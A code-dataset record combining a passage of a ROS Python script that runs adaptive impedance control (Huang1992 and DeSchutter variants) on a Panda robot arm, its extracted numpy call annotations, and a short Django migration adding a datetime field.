def update_MBK_hat(lam,M,B,K): M_hat = M # + np.diagflat(lam[0:6]) M is chosen to be constant B_hat = B + np.diagflat(lam[6:12]) K_hat = K + np.diagflat(lam[12:18]) #ensure_limits(1,5000,M_hat) ensure_limits(1,5000,B_hat) ensure_limits(1,5000,K_hat) return M_hat, B_hat, K_hat # Calculate and perform the torque as in equation (10) in [Huang1992] def perform_torque_Huang1992(M, B, K, x_d_ddot, x_d_dot,x_dot, p_d, goal_ori): a = np.linalg.multi_dot([robot.jacobian().T,get_W(inv=True),np.linalg.inv(M)]) b = np.array([np.dot(M,x_d_ddot)]).reshape([6,1]) + np.array([np.dot(B,get_x_dot_delta(x_d_dot,x_dot))]).reshape([6,1]) + np.array([np.dot(K,get_delta_x(goal_ori,p_d,two_dim = True))]).reshape([6,1]) c = robot.coriolis_comp().reshape([7,1]) d = (np.identity(6)-np.dot(get_W(inv=True),np.linalg.inv(M))).reshape([6,6]) total_torque = np.array([np.dot(a,b)]).reshape([7,1]) + c + np.array([np.linalg.multi_dot([robot.jacobian().T,d,get_F_ext()])]).reshape([7,1]) robot.set_joint_torques(dict(list(zip(robot.joint_names(),total_torque)))) """ TESTING AREA (Functions needed to run an adaptive version of DeSchutter's impedance controller) [with geometrically consistent stiffness] """ def skew(vector): return np.array([[0, -vector[2], vector[1]], [vector[2], 0, -vector[0]], [-vector[1], vector[0], 0]]) def from_three_to_six_dim(matrix): return np.block([[matrix,np.zeros((3,3))],[np.zeros((3,3)),matrix]]) def get_K_Pt_dot(R_d,K_pt,R_e): return np.array([0.5*np.linalg.multi_dot([R_d,K_pt,R_d.T])+0.5*np.linalg.multi_dot([R_e,K_pt,R_e.T])]) def get_K_Pt_ddot(p_d,R_d,K_pt): return np.array([0.5*np.linalg.multi_dot([skew(p_d-robot.endpoint_pose()['position']),R_d,K_pt,R_d.T])]) def E_quat(quat_n,quat_e): return np.dot(quat_n,np.identity(3))-skew(quat_e) def get_K_Po_dot(quat_n,quat_e,R_e,K_po): return np.array([2*np.linalg.multi_dot([E_quat(quat_n,quat_e).T,R_e,K_po,R_e.T])]) def get_h_delta(K_pt_dot,K_pt_ddot,p_delta,K_po_dot,quat_e): f_delta_t = np.array([np.dot(K_pt_dot,p_delta)]) m_delta_t = np.array([np.dot(K_pt_ddot,p_delta)]) null = np.zeros((3,1)) m_delta_o = np.array([np.dot(K_po_dot,quat_e)]) return np.array([np.append(f_delta_t.T,m_delta_t.T)]).T + np.array([np.append(null.T,m_delta_o.T)]).T def perform_torque_DeSchutter(M, B, K, x_d_ddot, x_d_dot,x_dot, p_d, Rot_d): # must include Rot_d J = robot.jacobian() Rot_e = robot.endpoint_pose()['orientation_R'] Rot_e_bigdim = from_three_to_six_dim(Rot_e) Rot_e_dot = np.dot(skew(robot.endpoint_velocity()['angular']),Rot_e) #not a 100 % sure about this one Rot_e_dot_bigdim = from_three_to_six_dim(Rot_e_dot) quat = quaternion.from_rotation_matrix(np.dot(Rot_e.T,Rot_d)) #orientational displacement represented as a unit quaternion #quat = robot.endpoint_pose()['orientation'] quat_e_e = np.array([quat.x,quat.y,quat.z]) # vector part of the unit quaternion in the frame of the end effector quat_e = np.dot(Rot_e.T,quat_e_e) # ... 
in the base frame quat_n = quat.w p_delta = p_d-robot.endpoint_pose()['position'] K_Pt_dot = get_K_Pt_dot(Rot_d,K[:3,:3],Rot_e) K_Pt_ddot = get_K_Pt_ddot(p_d,Rot_d,K[:3,:3]) K_Po_dot = get_K_Po_dot(quat_n,quat_e,Rot_e,K[3:,3:]) h_delta_e = np.array(np.dot(Rot_e_bigdim,get_h_delta(K_Pt_dot,K_Pt_ddot,p_delta,K_Po_dot,quat_e))).reshape([6,1]) h_e = get_F_ext(two_dim=True) h_e_e = np.array(np.dot(Rot_e_bigdim,h_e)) a_d_e = np.dot(Rot_e_bigdim,x_d_ddot).reshape([6,1]) v_d_e = np.dot(Rot_e_bigdim,x_d_dot).reshape([6,1]) alpha_e = a_d_e + np.dot(np.linalg.inv(M),(np.dot(B,v_d_e.reshape([6,1])-np.dot(Rot_e_bigdim,x_dot).reshape([6,1]))+h_delta_e-h_e_e)).reshape([6,1]) alpha = np.dot(Rot_e_bigdim.T,alpha_e).reshape([6,1])+np.dot(Rot_e_dot_bigdim.T,np.dot(Rot_e_bigdim,x_dot)).reshape([6,1]) torque = np.linalg.multi_dot([J.T,get_W(inv=True),alpha]).reshape((7,1)) + np.array(robot.coriolis_comp().reshape((7,1))) + np.dot(J.T,h_e).reshape((7,1)) robot.set_joint_torques(dict(list(zip(robot.joint_names(),torque)))) """ TESTING AREA """ # -------------- Plotting ------------------------ def plot_result(v_num, v,p,p_d, delta_x, F_ext,F_d, z_dynamics,M,B,K, T): time_array = np.arange(len(p[0]))*T plt.subplot(211) plt.title("External force") plt.plot(time_array, F_ext[2], label="force z [N]") plt.plot(time_array, F_d[2], label="desired force z [N]", color='b',linestyle='dashed') plt.xlabel("Real time [s]") plt.legend() plt.subplot(212) plt.title("Position") plt.plot(time_array, p[0,:], label = "true x [m]") plt.plot(time_array, p[1,:], label = "true y [m]") plt.plot(time_array, p[2,:], label = "true z [m]") plt.plot(time_array, p_d[0,:], label = "desired x [m]", color='b',linestyle='dashed') plt.plot(time_array, p_d[1,:], label = "desired y [m]", color='C1',linestyle='dashed') plt.plot(time_array, p_d[2,:], label = "desired z [m]", color='g',linestyle='dashed') plt.xlabel("Real time [s]") plt.legend() """ plt.subplot(233) plt.title("Orientation error in Euler") plt.plot(time_array, delta_x[3]*(180/np.pi), label = "error Ori_x [degrees]") plt.plot(time_array, delta_x[4]*(180/np.pi), label = "error Ori_y [degrees]") plt.plot(time_array, delta_x[5]*(180/np.pi), label = "error Ori_z [degrees]") plt.xlabel("Real time [s]") plt.legend() plt.subplot(234) plt.title("Adaptive dynamics along the z-axis") plt.plot(time_array, z_dynamics[0], label = "inertia (M_z)") plt.plot(time_array, z_dynamics[1], label = "damping (B_z)") plt.plot(time_array, z_dynamics[2], label = "stiffness (K_z)") plt.axhline(y=M[2][2], label = "initial inertia (M_z)", color='b',linestyle='dashed') plt.axhline(y=B[2][2], label = "initial damping (B_z)", color='C1',linestyle='dashed') plt.axhline(y=K[2][2], label = "initial stiffness (K_z)", color='g',linestyle='dashed') plt.xlabel("Real time [s]") plt.legend() plt.subplot(235) plt.title("velocity read from rostopic") plt.plot(time_array, v[0], label = "vel x") plt.plot(time_array, v[1], label = "vel y") plt.plot(time_array, v[2], label = "vel z") plt.plot(time_array, v[3], label = "ang x") plt.plot(time_array, v[4], label = "ang y") plt.plot(time_array, v[5], label = "ang z") plt.xlabel("Real time [s]") plt.legend() plt.subplot(236) plt.title("numerically calculated velocity") plt.plot(time_array, v_num[0], label = "vel x") plt.plot(time_array, v_num[1], label = "vel y") plt.plot(time_array, v_num[2], label = "vel z") plt.plot(time_array, v_num[3], label = "ang x") plt.plot(time_array, v_num[4], label = "ang y") plt.plot(time_array, v_num[5], label = "ang z") plt.xlabel("Real time [s]") 
plt.legend() """ plt.show() if __name__ == "__main__": # ---------- Initialization ------------------- rospy.init_node("impedance_control") robot = PandaArm() publish_rate = 250 rate = rospy.Rate(publish_rate) T = 0.001*(1000/publish_rate) max_num_it = int(duration /T) #robot.move_to_joint_positions(new_start) robot.move_to_neutral() # List used to contain data needed for calculation of the torque output lam = np.zeros(18) v_history = np.zeros((6,max_num_it)) # Lists providing data for plotting p_history = np.zeros((3,max_num_it)) v_history_num = np.zeros((6,max_num_it)) x_history = np.zeros((6,max_num_it)) delta_x_history = np.zeros((6,max_num_it)) F_ext_history = np.zeros((6,max_num_it)) z_dynamics_history = np.zeros((3,max_num_it)) # Specify the desired behaviour of the robot x_d_ddot, x_d_dot, p_d = generate_desired_trajectory_tc(max_num_it,T,move_in_x = True) goal_ori = np.asarray(robot.endpoint_pose()['orientation']) # goal orientation = current (initial) orientation [remains the same the entire duration of the run] Rot_d = robot.endpoint_pose()['orientation_R'] # used by the DeSchutter implementation F_d = generate_F_d_tc(max_num_it,T) # ----------- The control loop ----------- for i in range(max_num_it): # update state-lists p_history[:,i] = get_p() x_history[:,i] = get_x(goal_ori) delta_x_history[:,i] = get_delta_x(goal_ori,p_d[:,i]) F_ext_history[:,i] = get_F_ext() x_dot = get_x_dot(x_history,i,T, numerically=False) #chose 'numerically' either 'True' or 'False' v_history_num[:,i] = get_x_dot(x_history,i,T, numerically=True) # only for plotting v_history[:,i] = get_x_dot(x_history,i,T) # for calculating error in acceleration # adapt M,B and K xi = get_xi(goal_ori, p_d[:,i],x_dot, x_d_dot[:,i], x_d_ddot[:,i], v_history, i, T) lam = lam.reshape([18,1]) + get_lambda_dot(gamma,xi,K_v,P,F_d[:,i]).reshape([18,1])*T M_hat,B_hat,K_hat = update_MBK_hat(lam,M,B,K) # Apply the resulting torque to the robot """CHOOSE ONE OF THE TWO CONTROLLERS BELOW""" perform_torque_Huang1992(M_hat, B_hat, K_hat, x_d_ddot[:,i], x_d_dot[:,i],x_dot, p_d[:,i], goal_ori) #perform_torque_DeSchutter(M_hat, B_hat, K_hat, x_d_ddot[:,i], x_d_dot[:,i],x_dot, p_d[:,i], Rot_d) rate.sleep() # plotting and printing z_dynamics_history[0][i]=M_hat[2][2] z_dynamics_history[1][i]=B_hat[2][2] z_dynamics_history[2][i]=K_hat[2][2] # Live printing to screen when the controller is running if i%100 == 0: print(i,'/',max_num_it,' = ',T*i,' [s] ) Force in z: ',F_ext_history[2,i]) print(K_hat[2][2]) print('') #Uncomment the block below to save plotting-data """ np.save('VIC_p_d.npy',p_d) np.save('VIC_p.npy',p_history) np.save('VIC_Fz_d.npy',F_d) np.save('VIC_Fz.npy',F_ext_history[2]) np.save('VIC_delta_x.npy',delta_x_history) #orientation error in radians np.save('VIC_adaptive_gains.npy',z_dynamics_history) """ plot_result(v_history_num,v_history, p_history, p_d, delta_x_history, F_ext_history, F_d, z_dynamics_history,M,B,K, T)
[((14, 0, 14, 32), 'numpy.set_printoptions', 'np.set_printoptions', (), '', True, 'import numpy as np\n'), ((47, 4, 52, 37), 'numpy.array', 'np.array', ({(47, 13, 52, 36): '[[Kp, 0, 0, 0, 0, 0], [0, Kp, 0, 0, 0, 0], [0, 0, Kpz, 0, 0, 0], [0, 0, 0,\n Ko, 0, 0], [0, 0, 0, 0, Ko, 0], [0, 0, 0, 0, 0, Ko]]'}, {}), '([[Kp, 0, 0, 0, 0, 0], [0, Kp, 0, 0, 0, 0], [0, 0, Kpz, 0, 0, 0], [\n 0, 0, 0, Ko, 0, 0], [0, 0, 0, 0, Ko, 0], [0, 0, 0, 0, 0, Ko]])', True, 'import numpy as np\n'), ((58, 4, 63, 37), 'numpy.array', 'np.array', ({(58, 13, 63, 36): '[[Bp, 0, 0, 0, 0, 0], [0, Bp, 0, 0, 0, 0], [0, 0, Bpz, 0, 0, 0], [0, 0, 0,\n Bo, 0, 0], [0, 0, 0, 0, Bo, 0], [0, 0, 0, 0, 0, Bo]]'}, {}), '([[Bp, 0, 0, 0, 0, 0], [0, Bp, 0, 0, 0, 0], [0, 0, Bpz, 0, 0, 0], [\n 0, 0, 0, Bo, 0, 0], [0, 0, 0, 0, Bo, 0], [0, 0, 0, 0, 0, Bo]])', True, 'import numpy as np\n'), ((68, 9, 68, 38), 'numpy.array', 'np.array', ({(68, 18, 68, 37): '[Mp, Mp, Mp, Mo, Mo, Mo]'}, {}), '([Mp, Mp, Mp, Mo, Mo, Mo])', True, 'import numpy as np\n'), ((69, 4, 69, 23), 'numpy.diagflat', 'np.diagflat', ({(69, 16, 69, 22): 'M_diag'}, {}), '(M_diag)', True, 'import numpy as np\n'), ((72, 6, 72, 20), 'numpy.identity', 'np.identity', ({(72, 18, 72, 19): '6'}, {}), '(6)', True, 'import numpy as np\n'), ((73, 4, 73, 18), 'numpy.identity', 'np.identity', ({(73, 16, 73, 17): '6'}, {}), '(6)', True, 'import numpy as np\n'), ((74, 8, 74, 23), 'numpy.identity', 'np.identity', ({(74, 20, 74, 22): '18'}, {}), '(18)', True, 'import numpy as np\n'), ((90, 8, 90, 32), 'numpy.zeros', 'np.zeros', ({(90, 17, 90, 31): '(6, iterations)'}, {}), '((6, iterations))', True, 'import numpy as np\n'), ((91, 8, 91, 32), 'numpy.zeros', 'np.zeros', ({(91, 17, 91, 31): '(6, iterations)'}, {}), '((6, iterations))', True, 'import numpy as np\n'), ((92, 8, 92, 32), 'numpy.zeros', 'np.zeros', ({(92, 17, 92, 31): '(3, iterations)'}, {}), '((3, iterations))', True, 'import numpy as np\n'), ((110, 8, 110, 32), 'numpy.zeros', 'np.zeros', ({(110, 17, 110, 31): '(6, iterations)'}, {}), '((6, iterations))', True, 'import numpy as np\n'), ((111, 8, 111, 32), 'numpy.zeros', 'np.zeros', ({(111, 17, 111, 31): '(6, iterations)'}, {}), '((6, iterations))', True, 'import numpy as np\n'), ((112, 8, 112, 32), 'numpy.zeros', 'np.zeros', ({(112, 17, 112, 31): '(3, iterations)'}, {}), '((3, iterations))', True, 'import numpy as np\n'), ((130, 8, 130, 32), 'numpy.zeros', 'np.zeros', ({(130, 17, 130, 31): '(6, iterations)'}, {}), '((6, iterations))', True, 'import numpy as np\n'), ((131, 8, 131, 32), 'numpy.zeros', 'np.zeros', ({(131, 17, 131, 31): '(6, iterations)'}, {}), '((6, iterations))', True, 'import numpy as np\n'), ((132, 8, 132, 32), 'numpy.zeros', 'np.zeros', ({(132, 17, 132, 31): '(3, iterations)'}, {}), '((3, iterations))', True, 'import numpy as np\n'), ((152, 8, 152, 32), 'numpy.zeros', 'np.zeros', ({(152, 17, 152, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((153, 8, 153, 32), 'numpy.zeros', 'np.zeros', ({(153, 17, 153, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((154, 8, 154, 32), 'numpy.zeros', 'np.zeros', ({(154, 17, 154, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((177, 8, 177, 32), 'numpy.zeros', 'np.zeros', ({(177, 17, 177, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((178, 8, 178, 32), 'numpy.zeros', 'np.zeros', ({(178, 17, 178, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((179, 8, 179, 32), 
'numpy.zeros', 'np.zeros', ({(179, 17, 179, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((202, 8, 202, 32), 'numpy.zeros', 'np.zeros', ({(202, 17, 202, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((203, 8, 203, 32), 'numpy.zeros', 'np.zeros', ({(203, 17, 203, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((204, 8, 204, 32), 'numpy.zeros', 'np.zeros', ({(204, 17, 204, 31): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((268, 11, 268, 35), 'numpy.append', 'np.append', ({(268, 21, 268, 26): 'pos_x', (268, 27, 268, 34): 'rel_ori'}, {}), '(pos_x, rel_ori)', True, 'import numpy as np\n'), ((317, 15, 317, 55), 'quaternion.as_rotation_matrix', 'quaternion.as_rotation_matrix', ({(317, 45, 317, 54): 'quat_curr'}, {}), '(quat_curr)', False, 'import quaternion\n'), ((318, 14, 318, 53), 'quaternion.as_rotation_matrix', 'quaternion.as_rotation_matrix', ({(318, 44, 318, 52): 'quat_des'}, {}), '(quat_des)', False, 'import quaternion\n'), ((320, 15, 320, 55), 'quaternion.from_rotation_matrix', 'quaternion.from_rotation_matrix', ({(320, 47, 320, 54): 'rel_mat'}, {}), '(rel_mat)', False, 'import quaternion\n'), ((333, 13, 333, 27), 'numpy.diagflat', 'np.diagflat', ({(333, 25, 333, 26): 'E'}, {}), '(E)', True, 'import numpy as np\n'), ((334, 17, 334, 35), 'numpy.diagflat', 'np.diagflat', ({(334, 29, 334, 34): 'E_dot'}, {}), '(E_dot)', True, 'import numpy as np\n'), ((335, 18, 335, 37), 'numpy.diagflat', 'np.diagflat', ({(335, 30, 335, 36): 'E_ddot'}, {}), '(E_ddot)', True, 'import numpy as np\n'), ((336, 11, 336, 52), 'numpy.block', 'np.block', ({(336, 20, 336, 51): '[E_ddot_diag, E_dot_diag, E_diag]'}, {}), '([E_ddot_diag, E_dot_diag, E_diag])', True, 'import numpy as np\n'), ((370, 11, 372, 49), 'numpy.array', 'np.array', ({(370, 20, 372, 48): '[[0, -vector[2], vector[1]], [vector[2], 0, -vector[0]], [-vector[1],\n vector[0], 0]]'}, {}), '([[0, -vector[2], vector[1]], [vector[2], 0, -vector[0]], [-vector[\n 1], vector[0], 0]])', True, 'import numpy as np\n'), ((392, 11, 392, 26), 'numpy.zeros', 'np.zeros', ({(392, 20, 392, 25): '(3, 1)'}, {}), '((3, 1))', True, 'import numpy as np\n'), ((407, 15, 407, 47), 'numpy.array', 'np.array', ({(407, 24, 407, 46): '[quat.x, quat.y, quat.z]'}, {}), '([quat.x, quat.y, quat.z])', True, 'import numpy as np\n'), ((408, 13, 408, 37), 'numpy.dot', 'np.dot', ({(408, 20, 408, 27): 'Rot_e.T', (408, 28, 408, 36): 'quat_e_e'}, {}), '(Rot_e.T, quat_e_e)', True, 'import numpy as np\n'), ((437, 4, 437, 20), 'matplotlib.pyplot.subplot', 'plt.subplot', ({(437, 16, 437, 19): '(211)'}, {}), '(211)', True, 'import matplotlib.pyplot as plt\n'), ((438, 4, 438, 31), 'matplotlib.pyplot.title', 'plt.title', ({(438, 14, 438, 30): '"""External force"""'}, {}), "('External force')", True, 'import matplotlib.pyplot as plt\n'), ((439, 4, 439, 55), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((440, 4, 440, 91), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((441, 4, 441, 31), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(441, 15, 441, 30): '"""Real time [s]"""'}, {}), "('Real time [s]')", True, 'import matplotlib.pyplot as plt\n'), ((442, 4, 442, 16), 'matplotlib.pyplot.legend', 'plt.legend', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((445, 4, 445, 20), 'matplotlib.pyplot.subplot', 'plt.subplot', ({(445, 16, 445, 19): '(212)'}, {}), '(212)', True, 
'import matplotlib.pyplot as plt\n'), ((446, 4, 446, 25), 'matplotlib.pyplot.title', 'plt.title', ({(446, 14, 446, 24): '"""Position"""'}, {}), "('Position')", True, 'import matplotlib.pyplot as plt\n'), ((447, 4, 447, 54), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((448, 4, 448, 54), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((449, 4, 449, 54), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((451, 4, 451, 89), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((452, 4, 452, 90), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((453, 4, 453, 89), 'matplotlib.pyplot.plot', 'plt.plot', (), '', True, 'import matplotlib.pyplot as plt\n'), ((454, 4, 454, 31), 'matplotlib.pyplot.xlabel', 'plt.xlabel', ({(454, 15, 454, 30): '"""Real time [s]"""'}, {}), "('Real time [s]')", True, 'import matplotlib.pyplot as plt\n'), ((455, 4, 455, 16), 'matplotlib.pyplot.legend', 'plt.legend', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((500, 4, 500, 14), 'matplotlib.pyplot.show', 'plt.show', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((509, 4, 509, 40), 'rospy.init_node', 'rospy.init_node', ({(509, 20, 509, 39): '"""impedance_control"""'}, {}), "('impedance_control')", False, 'import rospy\n'), ((510, 12, 510, 22), 'panda_robot.PandaArm', 'PandaArm', ({}, {}), '()', False, 'from panda_robot import PandaArm\n'), ((512, 11, 512, 35), 'rospy.Rate', 'rospy.Rate', ({(512, 22, 512, 34): 'publish_rate'}, {}), '(publish_rate)', False, 'import rospy\n'), ((521, 10, 521, 22), 'numpy.zeros', 'np.zeros', ({(521, 19, 521, 21): '18'}, {}), '(18)', True, 'import numpy as np\n'), ((522, 16, 522, 40), 'numpy.zeros', 'np.zeros', ({(522, 25, 522, 39): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((525, 16, 525, 40), 'numpy.zeros', 'np.zeros', ({(525, 25, 525, 39): '(3, max_num_it)'}, {}), '((3, max_num_it))', True, 'import numpy as np\n'), ((526, 20, 526, 44), 'numpy.zeros', 'np.zeros', ({(526, 29, 526, 43): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((527, 16, 527, 40), 'numpy.zeros', 'np.zeros', ({(527, 25, 527, 39): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((528, 22, 528, 46), 'numpy.zeros', 'np.zeros', ({(528, 31, 528, 45): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((529, 20, 529, 44), 'numpy.zeros', 'np.zeros', ({(529, 29, 529, 43): '(6, max_num_it)'}, {}), '((6, max_num_it))', True, 'import numpy as np\n'), ((530, 25, 530, 49), 'numpy.zeros', 'np.zeros', ({(530, 34, 530, 48): '(3, max_num_it)'}, {}), '((3, max_num_it))', True, 'import numpy as np\n'), ((234, 15, 234, 29), 'numpy.zeros', 'np.zeros', ({(234, 24, 234, 28): 'size'}, {}), '(size)', True, 'import numpy as np\n'), ((250, 15, 250, 31), 'numpy.linalg.inv', 'np.linalg.inv', ({(250, 29, 250, 30): 'W'}, {}), '(W)', True, 'import numpy as np\n'), ((290, 15, 290, 45), 'numpy.append', 'np.append', ({(290, 25, 290, 34): 'delta_pos', (290, 35, 290, 44): 'delta_ori'}, {}), '(delta_pos, delta_ori)', True, 'import numpy as np\n'), ((321, 10, 321, 45), 'quaternion.as_float_array', 'quaternion.as_float_array', ({(321, 36, 321, 44): 'rel_quat'}, {}), '(rel_quat)', False, 'import quaternion\n'), ((347, 16, 347, 38), 'numpy.diagflat', 'np.diagflat', ({(347, 28, 347, 37): 'lam[6:12]'}, {}), 
'(lam[6:12])', True, 'import numpy as np\n'), ((348, 16, 348, 39), 'numpy.diagflat', 'np.diagflat', ({(348, 28, 348, 38): 'lam[12:18]'}, {}), '(lam[12:18])', True, 'import numpy as np\n'), ((405, 43, 405, 64), 'numpy.dot', 'np.dot', ({(405, 50, 405, 57): 'Rot_e.T', (405, 58, 405, 63): 'Rot_d'}, {}), '(Rot_e.T, Rot_d)', True, 'import numpy as np\n'), ((419, 21, 419, 45), 'numpy.dot', 'np.dot', ({(419, 28, 419, 40): 'Rot_e_bigdim', (419, 41, 419, 44): 'h_e'}, {}), '(Rot_e_bigdim, h_e)', True, 'import numpy as np\n'), ((232, 15, 232, 71), 'numpy.subtract', 'np.subtract', ({(232, 27, 232, 47): 'history[:, (iteration)]', (232, 48, 232, 70): 'history[:, (iteration - 1)]'}, {}), '(history[:, (iteration)], history[:, (iteration - 1)])', True, 'import numpy as np\n'), ((341, 59, 341, 77), 'numpy.linalg.inv', 'np.linalg.inv', ({(341, 73, 341, 76): 'K_v'}, {}), '(K_v)', True, 'import numpy as np\n'), ((357, 64, 357, 80), 'numpy.linalg.inv', 'np.linalg.inv', ({(357, 78, 357, 79): 'M'}, {}), '(M)', True, 'import numpy as np\n'), ((384, 25, 384, 39), 'numpy.identity', 'np.identity', ({(384, 37, 384, 38): '(3)'}, {}), '(3)', True, 'import numpy as np\n'), ((390, 26, 390, 50), 'numpy.dot', 'np.dot', ({(390, 33, 390, 41): 'K_pt_dot', (390, 42, 390, 49): 'p_delta'}, {}), '(K_pt_dot, p_delta)', True, 'import numpy as np\n'), ((391, 26, 391, 51), 'numpy.dot', 'np.dot', ({(391, 33, 391, 42): 'K_pt_ddot', (391, 43, 391, 50): 'p_delta'}, {}), '(K_pt_ddot, p_delta)', True, 'import numpy as np\n'), ((393, 26, 393, 49), 'numpy.dot', 'np.dot', ({(393, 33, 393, 41): 'K_po_dot', (393, 42, 393, 48): 'quat_e'}, {}), '(K_po_dot, quat_e)', True, 'import numpy as np\n'), ((421, 12, 421, 41), 'numpy.dot', 'np.dot', ({(421, 19, 421, 31): 'Rot_e_bigdim', (421, 32, 421, 40): 'x_d_ddot'}, {}), '(Rot_e_bigdim, x_d_ddot)', True, 'import numpy as np\n'), ((422, 12, 422, 40), 'numpy.dot', 'np.dot', ({(422, 19, 422, 31): 'Rot_e_bigdim', (422, 32, 422, 39): 'x_d_dot'}, {}), '(Rot_e_bigdim, x_d_dot)', True, 'import numpy as np\n'), ((341, 33, 341, 53), 'numpy.linalg.inv', 'np.linalg.inv', ({(341, 47, 341, 52): 'gamma'}, {}), '(gamma)', True, 'import numpy as np\n'), ((360, 9, 360, 23), 'numpy.identity', 'np.identity', ({(360, 21, 360, 22): '6'}, {}), '(6)', True, 'import numpy as np\n'), ((375, 29, 375, 44), 'numpy.zeros', 'np.zeros', ({(375, 38, 375, 43): '(3, 3)'}, {}), '((3, 3))', True, 'import numpy as np\n'), ((375, 47, 375, 62), 'numpy.zeros', 'np.zeros', ({(375, 56, 375, 61): '(3, 3)'}, {}), '((3, 3))', True, 'import numpy as np\n'), ((424, 12, 424, 42), 'numpy.dot', 'np.dot', ({(424, 19, 424, 33): 'Rot_e_bigdim.T', (424, 34, 424, 41): 'alpha_e'}, {}), '(Rot_e_bigdim.T, alpha_e)', True, 'import numpy as np\n'), ((425, 128, 425, 143), 'numpy.dot', 'np.dot', ({(425, 135, 425, 138): 'J.T', (425, 139, 425, 142): 'h_e'}, {}), '(J.T, h_e)', True, 'import numpy as np\n'), ((164, 45, 164, 75), 'numpy.sin', 'np.sin', ({(164, 52, 164, 74): '(it * T / 4 * 2 * np.pi + np.pi / 2)'}, {}), '(it * T / 4 * 2 * np.pi + np.pi / 2)', True, 'import numpy as np\n'), ((189, 45, 189, 77), 'numpy.sin', 'np.sin', ({(189, 52, 189, 76): '(2 * it * T / 4 * 2 * np.pi + np.pi / 2)'}, {}), '(2 * it * T / 4 * 2 * np.pi + np.pi / 2)', True, 'import numpy as np\n'), ((214, 45, 214, 77), 'numpy.sin', 'np.sin', ({(214, 52, 214, 76): '(2 * it * T / 4 * 2 * np.pi + np.pi / 2)'}, {}), '(2 * it * T / 4 * 2 * np.pi + np.pi / 2)', True, 'import numpy as np\n'), ((360, 47, 360, 63), 'numpy.linalg.inv', 'np.linalg.inv', ({(360, 61, 360, 62): 'M'}, {}), '(M)', True, 
'import numpy as np\n'), ((378, 25, 378, 62), 'numpy.linalg.multi_dot', 'np.linalg.multi_dot', ({(378, 45, 378, 61): '[R_d, K_pt, R_d.T]'}, {}), '([R_d, K_pt, R_d.T])', True, 'import numpy as np\n'), ((378, 67, 378, 104), 'numpy.linalg.multi_dot', 'np.linalg.multi_dot', ({(378, 87, 378, 103): '[R_e, K_pt, R_e.T]'}, {}), '([R_e, K_pt, R_e.T])', True, 'import numpy as np\n'), ((395, 21, 395, 55), 'numpy.append', 'np.append', ({(395, 31, 395, 42): 'f_delta_t.T', (395, 43, 395, 54): 'm_delta_t.T'}, {}), '(f_delta_t.T, m_delta_t.T)', True, 'import numpy as np\n'), ((395, 72, 395, 101), 'numpy.append', 'np.append', ({(395, 82, 395, 88): 'null.T', (395, 89, 395, 100): 'm_delta_o.T'}, {}), '(null.T, m_delta_o.T)', True, 'import numpy as np\n'), ((423, 29, 423, 45), 'numpy.linalg.inv', 'np.linalg.inv', ({(423, 43, 423, 44): 'M'}, {}), '(M)', True, 'import numpy as np\n'), ((424, 84, 424, 110), 'numpy.dot', 'np.dot', ({(424, 91, 424, 103): 'Rot_e_bigdim', (424, 104, 424, 109): 'x_dot'}, {}), '(Rot_e_bigdim, x_dot)', True, 'import numpy as np\n'), ((287, 25, 287, 55), 'numpy.append', 'np.append', ({(287, 35, 287, 44): 'delta_pos', (287, 45, 287, 54): 'delta_ori'}, {}), '(delta_pos, delta_ori)', True, 'import numpy as np\n'), ((358, 18, 358, 36), 'numpy.dot', 'np.dot', ({(358, 25, 358, 26): 'M', (358, 27, 358, 35): 'x_d_ddot'}, {}), '(M, x_d_ddot)', True, 'import numpy as np\n'), ((361, 29, 361, 40), 'numpy.dot', 'np.dot', ({(361, 36, 361, 37): 'a', (361, 38, 361, 39): 'b'}, {}), '(a, b)', True, 'import numpy as np\n'), ((423, 77, 423, 103), 'numpy.dot', 'np.dot', ({(423, 84, 423, 96): 'Rot_e_bigdim', (423, 97, 423, 102): 'x_dot'}, {}), '(Rot_e_bigdim, x_dot)', True, 'import numpy as np\n')]
intellineers/django-bridger
tests/migrations/0010_modeltest_datetime_field1.py
ed097984a99df7da40a4d01bd00c56e3c6083056
# Generated by Django 2.2.9 on 2020-01-28 14:50

import django.utils.timezone
from django.db import migrations, models


class Migration(migrations.Migration):

    dependencies = [
        ("tests", "0009_auto_20200113_1239"),
    ]

    operations = [
        migrations.AddField(
            model_name="modeltest",
            name="datetime_field1",
            field=models.DateTimeField(default=django.utils.timezone.now),
            preserve_default=False,
        ),
    ]
[((17, 18, 17, 73), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import migrations, models\n')]
mdashkezari/pycmap
pycmap/common.py
5b526404d005ec220ab0911cd2f3c05263f9eda3
